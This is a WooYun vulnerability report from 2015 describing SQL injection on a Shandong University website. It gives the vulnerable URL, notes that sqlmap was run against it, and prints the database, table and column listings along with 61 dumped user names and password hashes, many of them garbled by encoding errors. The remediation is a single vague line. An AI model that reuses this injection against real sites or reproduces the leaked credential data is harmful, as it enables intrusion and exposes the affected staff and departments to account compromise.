山东大学某网站SQL注射漏洞，用户数据挺大 | wooyun-2015-095007| WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095007

漏洞标题：山东大学某网站SQL注射漏洞，用户数据挺大

相关厂商：山东大学

漏洞作者： letboy

提交时间：2015-02-03 14:39

修复时间：2015-02-08 14:40

公开时间：2015-02-08 14:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：9

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-03：细节已通知厂商并且等待厂商处理中
2015-02-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

山东大学某网站SQL注射漏洞，用户数据挺多的。没时间了，就dump出一些

详细说明：

http://www.rd.sdu.edu.cn/newsDetail?sno=news1422238689967 此网页有sql注射漏洞，上sqlmap跑一跑
web application technology: JSP
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] sduorataweb
[*] test
sduorataweb和test中用户数据很多
编码有点乱，
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
[19 tables]
+---------------------------+
| news_info |
| pub_authorities |
| pub_authorities_resources |
| pub_menu |
| pub_org |
| pub_org_desc |
| pub_resources |
| pub_resources_menus |
| pub_roles |
| pub_roles_authorities |
| pub_sys_param |
| pub_users |
| pub_users_roles |
| sdu_activity_info |
| sdu_contact |
| sdu_faculty |
| sdu_news |
| user_activity_type |
| user_news_type |
+---------------------------+
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
Table: pub_users
[15 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| enable | char(1) |
| err_times | varchar(4) |
| is_sys | char(1) |
| mail | varchar(64) |
| qq_weixin | varchar(32) |
| user_account | varchar(32) |
| user_birthday | varchar(12) |
| user_desc | varchar(128) |
| user_duty | varchar(32) |
| user_gender | char(1) |
| user_id | varchar(32) |
| user_name | varchar(64) |
| user_org | varchar(32) |
| user_password | varchar(32) |
| user_telephone | varchar(20) |
+----------------+--------------+
用户很多

漏洞证明：

列出一小部分，其他数据没dump出来
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
Table: pub_users
[61 entries]
+-----------------------------------+----------------------------------+
| user_name | user_password |
+-----------------------------------+----------------------------------+
| ä»»æ•�åˆ© | 066813794cbf095f772eb6080b3775f0 |
| ä½“è‚²å¦é™¢ | 1bb356b8099e3512dc2bea78c7e49210 |
| ä¿¡æ�¯ç§‘å¦ä¸Žå·¥ç¨‹å¦é™¢ | 9f5dd80fdf16ed6b03a3ba64077a8ebc |
| å‚…èŒ‚ç¬‹ | 400749545f4453165269dc09683d6321 |
| å„’å¦é«˜ç‰ç ”ç©¶é™¢ | 3c21c1a7a7b6de51ec8a555b984c0def |
| å…¬å…±å�«ç”Ÿå¦é™¢ | 6fd062bd066d10cdc1ca9ba0d7ce62c6 |
| åˆ˜å…¨èŠ¬ | 602248d146e6e13bb9356f3c8dc326f6 |
| åˆ˜å¾·å®� | 97f2e06e89e1425fdc8b7ce878314947 |
| åˆ˜æ�° | 4f644bf087c383b30bf3c674f1f3d7b5 |
| åˆ˜æ¨±çº¢ | 7b0d7e717e3c59d369d966d3b7b47b10 |
| åˆ˜ç�¿åˆš | 37518deab62a1a07b49c4f8f5fe8d434 |
| åˆ˜é«˜è¿œ | eb4081f7f343c039f55f67183ad110d6 |
| åŒ–å¦ä¸ŽåŒ–å·¥å¦é™¢ | 6b26e0c12c7d8c9c78087156fd850e9d |
| åŒ»å¦é™¢ | 1980c2d87a86abb7385510a3673ba57a |
| å�«ç”Ÿç®¡ç�†ä¸Žæ”¿ç–ç ”ç©¶ä¸å¿ƒ | bd55ed33379be5b2885db1cde6cd336e |
| åŽ†å�²æ–‡åŒ–å¦é™¢ | cd8c99a2f61e18bd4fbaecf31a3ee833 |
| å�£è…”åŒ»å¦é™¢ | 4fb0e5d2f845668cea1db6c700c726ae |
| å‘¨æ•¬é¦¨ | 293ace9056262d59803ef87a7d306dd2 |
| å‘¨æ¡‚è�£ | 05d992a1233181d323da998f0da1635c |
| å“²å¦ä¸Žç¤¾ä¼šå�‘å±•å¦é™¢ | 0b11f32425e8272bb0f497f274ea6694 |
| å›½å®¶ç³–å·¥ç¨‹æŠ€æœ¯ç ”ç©¶ä¸å¿ƒ | 817ebf0023917cd28f68c25da86dc9ef |
| å›½é™…æ•™è‚²å¦é™¢ | 758819760d4b6d6c40603f349b978ebe |
| åœŸå»ºä¸Žæ°´åˆ©å¦é™¢ | bc807c06dd99d503478317da328bd0b0 |
| å¤–å›½è¯å¦é™¢ | 0564acecbafb6e42a75cc6ceb0a290da |
| å¨�æµ·æ ¡åŒº | fd197f06e4ba7c7c722f7be16b1f8435 |
| å™ä¹�å†› | e69fd2beeba7d382d65d43479244a07c |
| å™å�› | 58552168024c47092689ef29fe1f72aa |
| å™å²© | 69329ceb1b86f4995c6c015d6a9cc7f5 |
| å¼ å¸Œå�Ž | e6272190ee10977acc7d66accea4c071 |
| å¼ å»º | cd15edaa0173e2f982da9625c9a7b19f |
| å¼ æ˜¥å�Ž | 7ce5c0eb07b809cb13782ccdb40ea8f3 |
| å¼ çŽ‰ç”Ÿ | 7e3dac7129b0740ff64ced86266c4ddd |
| å¼ ç�³ | 0d5d2b98d44e5e295010f35075fb9da8 |
| å¾�é˜³ | 3dba715d80298812788d90e1cc17a189 |
| æŠ¤ç�†å¦é™¢ | a27b78a3ee07b9c9eaefcc77c4646b46 |
| æŽ§åˆ¶ç§‘å¦ä¸Žå·¥ç¨‹å¦é™¢ | 59522684758b7d941134d07aafd6b18d |
| æ”¿æ²»å¦ä¸Žå…¬å…±ç®¡ç�†å¦é™¢ | 71ac94fd64472f0d28ffe793aaa573e3 |
| æ•°å¦å¦é™¢ | ad80e97cd271ea3015a4ee786462fc64 |
| æ–‡å�²å“²ç ”ç©¶é™¢ | a7eb00eae2ee92e771fcb3c6173099c0 |
| æ–‡å¦ä¸Žæ–°é—»ä¼ æ’å¦é™¢ | 38e59e303e4afd03fd56efa63f3202ae |
| æ™¶ä½“æ��æ–™ç ”ç©¶æ‰€ | 53152a5bbb951cf1f6a5e7548a6d2472 |
| æœ±çºªè�ª | 77a3db69a87734855a73bd7e69148f4c |
| æœºæ¢°å·¥ç¨‹å¦é™¢ | ef3d2791523b4c6df5f98431a986bbf2 |
| æ�Žå‹‡ | beb64953fcb4ab5080a2ca33c4c08b8c |
| æ��æ–™ç§‘å¦ä¸Žå·¥ç¨‹å¦é™¢ | 3bc7e39b1481647e676fca8086fdd059 |
| æ�¨æ¸…èŒ¹ | 45e9c174826db1d979c701f5a7a66f6b |
| æž—ç¡• | 49bbaae717df7beb08b7d911e9e1b3fb |
| æ ¾ç»´ä¸œ | 13abf8bb725d21bc934b9f9379b2bf56 |
| æ¢�å®—ç£Š | c29c1e44bd6994066b761b020e9ccc3b |
| æ³•å¦é™¢ | 2cc4d86098a2e6ed63fbc872ee3a21f7 |
| ç‰›å¨ŸçŽ² | 3ab4d4cfa630fcadc3e7b166d24076bc |
| ç‰©ç�†å¦é™¢ | 3e1402e974fffd6441ce5878d215b001 |
| çŽ¯å¢ƒç§‘å¦ä¸Žå·¥ç¨‹å¦é™¢ | 089c99e47686725a1bb5c36b1bad1dbd |
| ç”Ÿå‘½ç§‘å¦å¦é™¢ | e6c2263db7c626031c72ac69089da3cd |
| ç”°é”¦ | 3ce59328538ae2e059e7cdc7bf4bb158 |
| ç”µæ°”å·¥ç¨‹å¦é™¢ | f8730c8b06076361238995fa478a4e11 |
| ç››æ¥ | b5f9d7714330cf3540e7d4d54b82d6d2 |
| ç¬¬äºŒåŒ»é™¢ | 584942ce77f716e2e187fbea0b1e74d1 |
| ç®¡ç�†å‘˜ | 8013fa1365b50731eb313075d272b95e |
| ç®¡ç�†å¦é™¢ | db806043a71c2d1b23c3ce6fba62b4e1 |
| ç»�æµŽå¦é™¢ | 4c24fbb7cbd696314e9ae06aa7af7594 |
+-----------------------------------+----------------------------------+

修复方案：

1 sql注射避免方法很多的

版权声明：转载请注明来源 letboy@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-02-08 14:40

厂商回复：

最新状态：

暂无